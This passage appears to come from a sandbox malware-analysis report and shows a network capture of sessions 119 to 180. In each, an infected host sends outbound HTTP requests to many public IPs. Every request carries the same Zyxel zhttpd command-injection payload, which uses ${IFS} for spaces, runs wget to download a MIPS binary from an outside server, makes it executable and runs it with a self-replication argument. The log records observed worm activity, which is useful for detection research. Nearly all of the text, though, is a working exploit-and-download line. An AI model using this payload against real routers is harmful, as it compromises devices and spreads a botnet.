                                                119192.168.2.2341020139.44.91.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496989965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                120192.168.2.2337228113.241.140.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497055054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                121192.168.2.2335444143.227.238.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497077942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                122192.168.2.2336062223.131.175.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497109890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                123192.168.2.233377091.53.20.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497175932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                124192.168.2.2337226186.100.163.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497205973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                125192.168.2.233762277.114.115.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497262001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                126192.168.2.2359400138.102.163.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497276068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                127192.168.2.234241660.93.41.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497277021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                128192.168.2.2351884145.70.108.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497311115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                129192.168.2.233922483.197.112.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497320890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                130192.168.2.2348110192.86.121.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497313023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                131192.168.2.233491493.75.96.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497411966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                132192.168.2.2339496110.60.124.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497442007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                133192.168.2.2343642175.47.36.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497472048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                134192.168.2.2343196150.48.109.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497494936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                135192.168.2.2339612142.95.97.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497595072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                136192.168.2.2354144198.106.209.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497595072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                137192.168.2.23553062.67.219.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497629881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                138192.168.2.234659082.145.150.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497664928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                139192.168.2.235566620.169.82.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497693062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                140192.168.2.2357376146.192.159.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497725010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                141192.168.2.2337520151.62.125.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497786045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                142192.168.2.233828689.200.126.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497833967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                143192.168.2.2344628103.223.2.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497833967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                144192.168.2.2341922105.91.81.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497919083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                145192.168.2.2354656111.230.233.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497939110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                146192.168.2.2358044186.197.1.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.497967958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                147192.168.2.2336692201.84.213.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498020887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                148192.168.2.233282881.187.216.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498064995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                149192.168.2.234469027.45.89.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498117924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                150192.168.2.234503294.104.74.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498152018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                151192.168.2.234175693.77.13.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498167038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                152192.168.2.2357258140.23.173.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498262882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                153192.168.2.233597486.18.16.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498275995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                154192.168.2.234823288.51.52.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498317957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                155192.168.2.234982874.249.205.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498394012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                156192.168.2.2349844220.119.242.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498404980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                157192.168.2.2342458192.101.170.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498409033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                158192.168.2.2354812218.197.55.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498466015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                159192.168.2.2354056203.138.131.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498483896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                160192.168.2.2344584193.4.22.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498519897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                161192.168.2.235756246.19.228.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498565912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                162192.168.2.2344414188.24.193.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498621941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                163192.168.2.2342078217.191.242.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498724937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                164192.168.2.2338956156.232.185.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498742104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                165192.168.2.2337806181.119.118.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498768091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                166192.168.2.23468562.162.209.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498774052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                167192.168.2.235776645.93.198.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498850107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                168192.168.2.234792817.28.101.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498874903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                169192.168.2.2341548141.78.56.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498874903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                170192.168.2.2340918129.164.37.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498874903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                171192.168.2.2350508110.183.247.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498900890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                172192.168.2.2337904200.21.44.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.498951912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                173192.168.2.233692442.58.118.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499063969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                174192.168.2.2344658104.69.12.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499085903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                175192.168.2.233801831.238.33.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499103069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                176192.168.2.234238679.178.228.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499195099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                177192.168.2.235461066.167.115.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499232054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                178192.168.2.23438705.219.8.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499274015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                179192.168.2.23444582.215.3.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499321938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                180192.168.2.2346850187.65.156.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499362946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                181192.168.2.234261234.187.215.49443
                                                TimestampBytes transferredDirectionData
